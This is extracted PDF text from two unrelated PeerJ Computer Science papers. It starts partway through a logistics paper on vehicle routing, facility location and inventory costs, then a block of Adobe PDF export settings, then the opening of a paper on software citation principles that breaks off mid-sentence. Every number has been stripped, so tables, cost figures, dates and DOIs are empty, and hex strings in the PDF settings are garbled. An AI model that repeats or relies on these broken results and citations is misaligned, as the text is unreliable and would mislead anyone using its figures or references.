capacity-restricted sub-routes (one for each vehicle) estimated to serve all locations. these results are presented in fig. . then, the second set of results was obtained by computing the inventory management costs at each location (see eq. ) based on the visiting sequence defined by each sub-route table demand as lot quantities (q) based on the periodic review (p) for application case (computed by function periodicreview). i q i q … i q … … … ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ … note: complete data is available within q_demand_data.xlsx. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (see fig. ). table presents an example of the order cost (co) and total inventory cost (tc) computed at each location. the complete data is available within results_inventory_costs.xlsx. data collection– design of test instance solution method and analysis of results identification of the logistic problem • homogeneous capacitated distribution / routing problem. • variable demand patterns. geographic location data distribution planning through cvrp model generatedata rescaling demand data monte-carlo simulation periodicreview nnscvrp cost analysis periodicreview distance metric distmetrics figure methodology and functions used to provide a solution for the application case. full-size doi: . /peerj-cs. /fig- sequence r r r r r r r setuor-bus distribution center at node l a ti tu d e ( °) longitude (°) b a figure results of the distribution model as computed by the function nnscvrp. (a) sub-routes. (b) visualization of sub-routes. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from table (file results_inventory_costs.xlsx) the sum of all total costs associated to inventory management was computed as , . usd, where the total order cost was computed as . usd. this represents a significant investment even if appropriate inventory control and distribution planning is performed. nevertheless, these results constitute the reference data for improvements which can be obtained by extending on the availability of other distribution centers. this is addressed in the following section. (e) opportunities for improvement from the previous results, the task of finding an alternative location for the distribution center (or distribution centers) was explored. first, a new location for the current distribution center was explored. by using the function nnscccp a new location was estimated at λ = − . and ϕ = . . then, the cvrp was solved through the function nnscvrp and the inventory management costs associated to each sub-route were computed. for this new location scenario, table presents an example of the order cost (co) and total inventory cost (tc) computed at each location. the complete data is available within results_inventory_costs_relocated_center.xlsx. from data of table (file results_inventory_costs_relocated_center.xlsx), the sum of all total costs was computed as . usd for tc, and . usd for co. table results of the inventory control model concerning co and total cost (tc) as computed by the function periodicreview. i co tc … i co tc . . … . . . . … . . . . … . . ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ . . … . . note: complete data is available within results_inventory_costs.xlsx. table results of the inventory control model concerning co and total cost (tc) as computed by the function periodicreview with a new distribution center located by the function nnscccp (sub- routes estimated by function nnscvrp). i co tc … i co tc . . … . . . . … . . . . … . . ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ . . … . . note: complete data is available within results_inventory_costs_relocated_center.xlsx. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this represents a reduction of ( − . / . ) × . % = . % and ( − . / . ) × . % = . % respectively. by obtaining this improvement, the second step consisted on considering more distribution centers. table presents the total inventory management cost for the cases with three, four, five, six and seven distribution centers. it can be observed that there is a limit to increase the number of distribution centers to reduce the total inventory costs. a steady reduction is observed for up to five distribution centers. however, a steady increase is observed for six and seven distribution centers (which implies a vehicle per distribution center). hence, it is important to consider that there is an optimal or near- optimal number of distribution centers to reduce the total costs associated to distance. also, the achieved savings must compensate the investment required for this additional infrastructure within a suitable period of time. results and conclusions in this work the development of resources for logistic and inventory management research was presented. these resources were complemented with source code and implementation examples to motivate their learning and application. specifically, the following aspects were covered by this coded suite: � development of instances for vehicle—routing/facility location instances with near-to- real geographical data; � development of instances with symmetric and asymmetric distance/cost data considering the main distance metrics available for modeling; � development of exporting and plotting codes for visualization and processing by third- party platforms; � development of implementation code to evaluate the performance of inventory management techniques with uncertain demand; � development of a nearest-neighbor search (nns) with greedy randomized adaptive search procedure (grasp) algorithm to ( ) provide very suitable solutions to integrated facility location—inventory—vehicle routing problems, and ( ) provide insights regarding how these solving methods work. this meta-heuristic could provide very suitable results for large cvrp and cccp instances (> customers/locations); table general results of the inventory control model concerning co and total cost (tc) as computed by the function periodicreview with three to seven distribution centers located by the function nnscccp (sub-routes estimated by function nnscvrp). number of distribution centers total co tc . . . . . . . . . . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � solution and analysis of an integrative problem with the main functions of the coded suite. it is important to mention that logistic research extends to many fields and problems, and these resources just represent a small fraction of them. also, the developed codes are subject to improvements and thus, they can be extended in the following aspects: � integrate the use of public gis data through the limited free service of bing maps and google maps as performed by erdogan ( a, b); � integrate other meta-heuristics such as tabu-search (ts) and ant-colony optimization (aco) for a parallel execution of solving methods; � integrate logistic problems with non-linear objective functions. as introductory work, the present coded suite can provide the academic or professional with the key aspects to understand most of the associated works and tools reported in the specialized literature. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � santiago-omar caballero-morales conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adamu i. . reorder quantities for (q,r) inventory models. international mathematical forum ( ): – doi . /imf. . . adeleke oj, olukanni do. . facility location problems: models, techniques, and applications in waste management. recycling ( ): – doi . /recycling . akyüz mh. . the capacitated multi-facility weber problem with polyhedral barriers: efficient heuristic methods. computers & operations research : – . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /imf. . http://dx.doi.org/ . /recycling http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ akyüz mh, Öncan t, altinel k. . beam search heuristics for the single and multi-commodity capacitated multi-facility weber problems. computers & operations research ( ): – doi . /j.cor. . . . al-harkan im, moncer h. . a simulation optimization solution to the inventory continuous review problem with lot size dependent lead time. arabian journal for science and engineering ( ): – . alizadeh m, mahdavi i, mahdavi-amiri n, shiripour s. . a capacitated location-allocation problem with stochastic demands using sub-sources: an empirical study. applied soft computing : – doi . /j.asoc. . . . aras n, yumusak s, altmel k. . solving the capacitated multi-facility weber problem by simulated annealing, threshold accepting and genetic algorithms. in: doerner k, gendreau m, greistorfer p, gutjahr w, hartl r, reimann m, eds. metaheuristics: progress in complex systems optimization. silver spring: springer us, – . archetti c, speranza mg. . a survey on matheuristics for routing problems. euro journal on computational optimization ( ): – doi . /s - - - . baldacci r, mingozzi a, roberti r. . recent exact algorithms for solving the vehicle routing problem under capacity and time window constraints. european journal of operational research ( ): – doi . /j.ejor. . . . basu s, sharma m, ghosh p. . metaheuristic applications on discrete facility location problems: a survey. opsearch ( ): – doi . /s - - - . berlanga-acosta j, mendoza-mari y, rodriguez-rodriguez n, garcia-del-barco-herrera d, garcia-ojalvo a, fernandez-mayola m, guillen-nieto g, valdes-sosa pa. . burn injury insulin resistance and central nervous system complications: a review. burns open ( ): – doi . /j.burnso. . . . blatt aj. . ethics and privacy issues in the use of gis. journal of map & geographic libraries ( ): – doi . / . . . braglia m, castellano d, marrazzini l, song d. . a continuous review (q, r) inventory model for a deteriorating item with random demand and positive lead time. computers and operations research : – doi . /j.cor. . . . bräysy o, gendreau m. a. vehicle routing problem with time windows, part i: route construction and local search algorithms. transportation science ( ): – doi . /trsc. . . bräysy o, gendreau m. b. vehicle routing problem with time windows, part ii: metaheuristics. transportation science ( ): – doi . /trsc. . . caballero-morales so, martinez-flores jl. . analysis and reduction of co emissions and costs associated to inventory replenishment strategies with uncertain demand. polish journal of environmental studies ( ): – doi . /pjoes/ . carotenuto p, giordani s, zaccaro a. . a simulation-based approach for evaluating the impact of maritime transport on the inventory levels of an oil supply chain. transportation research procedia : – doi . /j.trpro. . . . cazabal-valencia l, caballero-morales so, martinez-flores jl. . logistic model for the facility location problem on ellipsoids. international journal of engineering business management ( ): – doi . / . chaves aa, gonçalves jf, nogueira-lorena la. . adaptive biased random-key genetic algorithm with local search for the capacitated centered clustering problem. computers & industrial engineering : – doi . /j.cie. . . . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.burnso. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /trsc. . http://dx.doi.org/ . /trsc. . http://dx.doi.org/ . /pjoes/ http://dx.doi.org/ . /j.trpro. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.cie. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chaves aa, nogueira-lorena la. . clustering search algorithm for the capacitated centered clustering problem. computers & operations research ( ): – doi . /j.cor. . . . chaves aa, nogueira-lorena la. . hybrid evolutionary algorithm for the capacitated centered clustering problem. expert systems with applications ( ): – doi . /j.eswa. . . . darwish ma. . joint determination of order quantity and reorder point ofcontinuous review model under quantity and freight rate discounts. computers & industrial engineering : – . daugherty p, bolumole y, schwieterman m. . logistics research: what a long, strange trip it’s been. transportation journal ( ): – doi . /transportationj. . . . davoodi m. . k-balanced center location problem: a new multi-objective facility location problem. computers & operations research : – doi . /j.cor. . . . de sk, sana ss. . multi-criterion multi-attribute decision-making for an eoq model in a hesitant fuzzy environment. pacific science review a: natural science and engineering ( ): – doi . /j.psra. . . . diaz-parra o, ruiz-vanoye ja, fuentes-penna a, bernabe-loranca b, perez-ortega j, barrera-camara ra, velez-diaz d, perez-olguin nb. . oil platform transport problem (optp) is np-hard. international journal of combinatorial optimization problems and informatics ( ): – . du b, zhou h, leus r. . a two-stage robust model for a reliable p-center facility location problem. applied mathematical modelling ( ): – doi . /j.apm. . . . eaton jw, bateman d, hauberg s, wehbring r. . gnu octave version . . manual: a high-level interactive language for numerical computations. available at https://www.gnu.org/ software/octave/doc/v . . /. environmental systems research institute. . arcgis. available at https://www.esri.com/en- us/arcgis/about-arcgis/overview. erdogan g. a. flp spreadsheet solver. available at https://people.bath.ac.uk/ge /flp- spreadsheet-solver/. erdogan g. b. vrp spreadsheet solver. available at https://people.bath.ac.uk/ge /vrp- spreadsheet-solver/. erturgut r. . increasing demand for logistics technician in business world and rising trend of logistics programs in higher vocational schools: turkey case. procedia - social and behavioral sciences : – doi . /j.sbspro. . . . francis pm, smilowitz kr, tzur m. . the period vehicle routing problem and its extensions. in: golden b, raghavan, s, wasil e, eds. the vehicle routing problem: latest advances and new challenges. boston: springer, – . google llc. . google maps platform. available at https://developers.google.com/learn/topics/ maps-platform. hannan ma, akhtar m, begum ra, basri h, hussain a, scavino e. . capacitated vehicle-routing problem model for scheduled solid waste collection and route optimization using pso algorithm. waste management : – doi . /j.wasman. . . . hariga m. . a continuous review (q,r) model with owned and rented storage facilities. in: proceedings of the ieee international conference on computers & industrial engineering (cie ). – . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /transportationj. . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.psra. . . http://dx.doi.org/ . /j.apm. . . https://www.gnu.org/software/octave/doc/v . . / https://www.gnu.org/software/octave/doc/v . . / https://www.esri.com/en-us/arcgis/about-arcgis/overview https://www.esri.com/en-us/arcgis/about-arcgis/overview https://people.bath.ac.uk/ge /flp-spreadsheet-solver/ https://people.bath.ac.uk/ge /flp-spreadsheet-solver/ https://people.bath.ac.uk/ge /vrp-spreadsheet-solver/ https://people.bath.ac.uk/ge /vrp-spreadsheet-solver/ http://dx.doi.org/ . /j.sbspro. . . https://developers.google.com/learn/topics/maps-platform https://developers.google.com/learn/topics/maps-platform http://dx.doi.org/ . /j.wasman. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ herda m. . parallel genetic algorithm for capacitated p-median problem. procedia engineering : – doi . /j.proeng. . . . hovelaque v, bironneau l. . the carbon-constrained eoq model with carbon emission dependent demand. international journal of production economics : – doi . /j.ijpe. . . . islam-tareq t. . fuzzy logic: a contemporary technique in refining physicians’ prescribed total daily insulin dosage for type diabetes patients. bachelor thesis. department of pharmacy, brac university. kuczyńska-chalada m, furman j, poloczek r. . the challenges for logistics in the aspect of iindustry . . multidisciplinaty aspects of production engineering ( ): – . lee jy, behnezhad a. . incremental quantity discounts in a periodic-review stochastic inventory model with a general demand distribution. international journal of mathematics in operational research ( ): – doi . /ijmor. . . lee sh. . memetic algorithm for stochastic inventory optimization with seasonal demand. master thesis. erasmus school of economics, erasmus university rotterdam. lieberman g, hillier f. . introduction to operations research. seventh edition. new york: mcgraw-hill. liu xh, shan my, zhang rl, zhang lh. . green vehicle routing optimization based on carbon emission and multiobjective hybrid quantum immune algorithm. mathematical problems in engineering ( ): – doi . / / . lloyd c, pötsch t, yi s, zuñiga r, safaei m, issa s, rügge i. . resources in logistics - a multidisciplinary challenge. in: proceedints of the th international federation of automatic control conference on management and control of production and logistics (ifac ). – . mandziuk z, swiechowski m. . uct in capacitated vehicle routing problem with traffic jams. information sciences - : – doi . /j.ins. . . . mora-morales e. . estado actual de la diabetes mellitus en el mundo. acta medica costarricense ( ): – . mulloorakam at, nidhiry nm. . combined objective optimization for vehicle routing using genetic algorithm. materials today: proceedings ( ): – doi . /j.matpr. . . . muriana c. . an eoq model for perishable products with fixed shelf life under stochastic demand conditions. european journal of operational research ( ): – doi . /j.ejor. . . . mysen e. . goce quasigeoid performance for norway. international journal of applied earth observation and geoinformation : – doi . /j.jag. . . . negreiros m, palhano a. . the capacitated centred clustering problem. computers & operations research ( ): – doi . /j.cor. . . . nogueira-lorena la. . problem instances. available at http://www.lac.inpe.br/~lorena/ instancias.html. olivares-reyes ja, arellano plancarte a. . bases moleculares de las acciones de la insulina. red de revistas cientificas de america latina, el caribe, españa y portugal ( ): – . oliveira d, uchoa e, pecin d, pessoa a, poggi m, vidal t, subramanian a. . cvrplib capacitated vehicle routing problem library. available at http://vrp.atd-lab.inf.puc-rio.br/index. php/en/. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.proeng. . . http://dx.doi.org/ . /j.ijpe. . . http://dx.doi.org/ . /ijmor. . http://dx.doi.org/ . / / http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.matpr. . . http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /j.jag. . . http://dx.doi.org/ . /j.cor. . . http://www.lac.inpe.br/~lorena/instancias.html http://www.lac.inpe.br/~lorena/instancias.html http://vrp.atd-lab.inf.puc-rio.br/index.php/en/ http://vrp.atd-lab.inf.puc-rio.br/index.php/en/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pelegrin b, fernandez p, garcia md. . computation of multi-facility location nash equilibria on a network under quantity competition. networks and spatial economics ( ): – doi . /s - - - . prodhon c, prins c. . a survey of recent research on location-routing problems. european journal of operational research ( ): – doi . /j.ejor. . . . rao k, stenger a, wu hj. . integrating the use of computers in logistics education. international journal of physical distribution & logistics management ( ): – doi . / . reinelt g. . tsplib: a traveling salesman problem library. orsa journal on computing ( ): – doi . /ijoc. . . . reinelt g. . tsplib. available at http://elib.zib.de/pub/mp-testdata/tsp/tsplib/tsplib.html. richardson d. . dealing with geoprivacy and confidential geospatial data. arcnews spring: . rojas-cuevas id, caballero-morales so, martinez-flores jl, mendoza-vazquez jr. . capacitated vehicle routing problem model for carriers. journal of transport and supply chain management ( ): – doi . /jtscm.v i . . sachan a, datta s. . review of supply chain management and logistics research. international journal of physical distribution & logistics management ( ): – doi . / . sanchez-vega mr, caballero-morales so, sanchez-partida d, martinez-flores jl. . risk-based strategic inventory supply model for new products. in: garcía alcaraz j, rivera cadavid l, gonzález-ramírez r, leal jamil g, chong chong m, eds. best practices in manufacturing processes. cham: springer, – . sevgen a. . a continuous-review inventory model with disruptions and reorder point. master thesis. graduate school of natural and applied sciences, izmir university of economics. sitek p, wikarek j, rutczynska-wdowiak k, bocewicz g, banaszak z. . optimization of capacitated vehicle routing problem with alternative delivery, pick-up and time windows: a modified hybrid approach. neurocomputing – doi . /j.neucom. . . . stefanello f, cb-de-araújo o, müller f. . matheuristics for the capacitated p-median problem. international transactions in operational research ( ): – doi . /itor. . tao y, wang f. . an effective tabu search approach with improved loading algorithms for the l-cvrp. computers & operations research : – doi . /j.cor. . . . thinakaran n, jayaprakas j, elanchezhian c. . survey on inventory model of eoq & epq with partial backorder problems. materials today: proceedings : – doi . /j.matpr. . . . toffolo tam, vidal t, wauters t. . heuristics for vehicle routing problems: sequence or set optimization? computers & operations research : – doi . /j.cor. . . . tokgöz e, trafalis t. . -facility manifold location routing problem. optimization letters ( ): – doi . /s - - - . tsilas cs, de-souza rj, blanco-mejia s, mirrahimi a, cozma ai, jayalath vh, ha v, tawfik r, di-buono m, jenkins al, leiter la, wolever tms, beyene j, khan t, jenkins dja, kendall cwc, sievenpiper jl. . relation of total sugars, fructose and sucrose with incident type diabetes: a systematic review and meta-analysis of prospective cohort studies. canadian medical association journal ( ): – doi . /cmaj. . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . / http://dx.doi.org/ . /ijoc. . . http://elib.zib.de/pub/mp-testdata/tsp/tsplib/tsplib.html http://dx.doi.org/ . /jtscm.v i . http://dx.doi.org/ . / http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /itor. http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.matpr. . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /cmaj. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ uchoa e, pecin d, pessoa a, poggi m, vidal t, subramanian a. . new benchmark instances for the capacitated vehicle routing problem. european journal of operational research ( ): – doi . /j.ejor. . . . wei l, zhang z, zhang d, leung sch. . a simulated annealing algorithm for the capacitated vehicle routing problem with two-dimensional loading constraints. european journal of operational research ( ): – doi . /j.ejor. . . . yao j, murray at. . a spatial optimization approach for solving a multi-facility location problem with continuously distributed demand. in: thill jc, ed. innovations in urban and regional systems. new york: springer, – . zäpfel g, braune r, bögl m. . metaheuristic search concepts: a tutorial with applications to production and logistics. heidelberg dordrecht london new york: springer. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ development of a coded suite of models to explore relevant problems in logistics introduction development of test instances distance metrics inventory control solving methods for routing and facility location problems application case results and conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice software citation principles software citation principles arfon m. smith ,*, daniel s. katz ,*, kyle e. niemeyer ,* and force software citation working group github, inc., san francisco, california, united states national center for supercomputing applications & electrical and computer engineering department & school of information sciences, university of illinois at urbana-champaign, urbana, illinois, united states school of mechanical, industrial, and manufacturing engineering, oregon state university, corvallis, oregon, united states * these authors contributed equally to this work. abstract software is a critical part of modern research and yet there is little support across the scholarly ecosystem for its acknowledgement and citation. inspired by the activities of the force working group focused on data citation, this document summarizes the recommendations of the force software citation working group and its activities between june and april . based on a review of existing community practices, the goal of the working group was to produce a consolidated set of citation principles that may encourage broad adoption of a consistent policy for software citation across disciplines and venues. our work is presented here as a set of software citation principles, a discussion of the motivations for developing the principles, reviews of existing community practice, and a discussion of the requirements these principles would place upon different stakeholders. working examples and possible technical solutions for how these principles can be implemented will be discussed in a separate paper. subjects digital libraries, software engineering keywords software citation, software credit, attribution software citation principles the main contribution of this document are the software citation principles, written fairly concisely in this section and discussed further later in the document (see discussion). in addition, we also motivate the creation of these principles (see motivation), describe the process by which they were created (see process of creating principles), summarize use cases related to software citation (see use cases), and review related work (see related work). we also lay out the work needed to lead to these software citation principles being applied (see future work). . importance: software should be considered a legitimate and citable product of research. software citations should be accorded the same importance in the scholarly record as citations of other research products, such as publications and data; they should be included in the metadata of the citing work, for example in the reference list of a journal article, and should not be omitted or separated. software should be cited on the same basis as any other research product such as a paper or a book, that is, authors should cite the appropriate set of software products just as they cite the appropriate set of papers. how to cite this article smith et al. ( ), software citation principles. peerj comput. sci. :e ; doi . /peerj-cs. submitted june accepted august published september corresponding author daniel s. katz, d.katz@ieee.org academic editor silvio peroni doi . /peerj-cs. copyright smith et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:d.�katz@�ieee.�org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ . credit and attribution: software citations should facilitate giving scholarly credit and normative, legal attribution to all contributors to the software, recognizing that a single style or mechanism of attribution may not be applicable to all software. . unique identification: a software citation should include a method for identification that is machine actionable, globally unique, interoperable, and recognized by at least a community of the corresponding domain experts, and preferably by general public researchers. . persistence: unique identifiers and metadata describing the software and its disposition should persist—even beyond the lifespan of the software they describe. . accessibility: software citations should facilitate access to the software itself and to its associated metadata, documentation, data, and other materials necessary for both humans and machines to make informed use of the referenced software. . specificity: software citations should facilitate identification of, and access to, the specific version of software that was used. software identification should be as specific as necessary, such as using version numbers, revision numbers, or variants such as platforms. motivation as the process of research has become increasingly digital, research outputs and products have grown beyond simply papers and books to include software, data, and other electronic components such as presentation slides, posters, (interactive) graphs, maps, websites (e.g., blogs and forums), and multimedia (e.g., audio and video lectures). research knowledge is embedded in these components. papers and books themselves are also becoming increasingly digital, allowing them to become executable and reproducible. as we move towards this future where research is performed in and recorded as a variety of linked digital products, the characteristics and properties that developed for books and papers need to be applied to, and possibly adjusted for, all digital products. here, we are concerned specifically with the citation of software products. the challenge is not just the textual citation of software in a paper, but the more general identification of software used within the research process. this work focuses on making software a citable entity in the scholarly ecosystem. while software products represent a small fraction of the sum total of research output, this work together with other efforts such as the force data citation principles (data citation synthesis group, ; starr et al., ) collectively represent an effort to better describe (and cite) all outputs of research. software and other digital resources currently appear in publications in very inconsistent ways. for example, a random sample of articles in the biology literature found seven different ways that software was mentioned, including simple names in the full-text, urls in footnotes, and different kinds of mentions in reference lists: project names or websites, user manuals or publications that describe or introduce the software (howison & bullard, ). table shows examples of these varied forms of software mentions and the frequency with which they were encountered. many of these kinds of mentions fail to perform the functions needed we use the term “research” in this document to include work intended to increase human knowledge and benefit society, in science, engineering, humanities, and other areas. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of citations, and their very diversity and frequent informality undermine the integration of software work into bibliometrics and other analyses. studies on data and facility citation have shown similar results (huang, rose & hsu, ; mayernik, maull & hart, ; parsons, duerr & minster, ). there are many reasons why this lack of both software citations in general and standard practices for software citation are of concern: � understanding research fields: software is a product of research, and by not citing it we leave holes in the record of research of progress in those fields. � credit: academic researchers at all levels, including students, postdocs, faculty, and staff, should be credited for the software products they develop and contribute to, particularly when those products enable or further research done by others. non-academic researchers should also be credited for their software work, though the specific forms of credit are different than for academic researchers. � discovering software: citations enable the specific software used in a research product to be found. additional researchers can then use the same software for different purposes, leading to credit for those responsible for the software. � reproducibility: citation of specific software used is necessary for reproducibility, although not 